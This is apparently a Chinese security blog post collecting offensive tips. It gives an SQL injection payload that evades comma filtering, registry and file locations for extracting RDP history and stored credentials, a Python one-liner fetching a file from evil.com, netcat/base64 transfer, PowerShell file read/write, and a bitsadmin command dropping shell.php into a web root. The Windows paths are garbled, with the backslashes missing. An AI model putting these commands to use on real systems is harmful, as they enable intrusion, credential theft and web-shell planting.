1233211234567

  • A+
所属分类:安全闲碎

分享几个tips,不记得哪里找的了。


注入过滤逗号

127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)# 

相当于 union select 1,2,3,4,5


注册表查看rdp记录

[HKEY_USERSS-1-5-21-1387774393-1596258019-1651181295-500SoftwareMicrosoftTerminal Server ClientDefault]

C:Documents and SettingsAdministratorAppDataLocalMicrosoftCredentials


只反弹个shell,传文件

curl ,ftp,wget,nc

python -c 'import urllib;urllib.urlretrieve("http://evil.com/evil.file","/path/to/save/evil.file")'

nc 'BASE64' | base64 -d > xxx


powershell读写文件

读文本文件:

$file = Get-Content "1.txt"

写文本文件:

Set-content "1.txt" "wocao"

读二进制文件:

[System.IO.File]::ReadAllBytes('1.exe')

写二进制文件:

[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)


下载文件

 windows:  bitsadmin /transfer n http://192.168.1.1/shell.php c:inetpubwwwrootshell.php

本文始发于微信公众号(关注安全技术):1233211234567

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: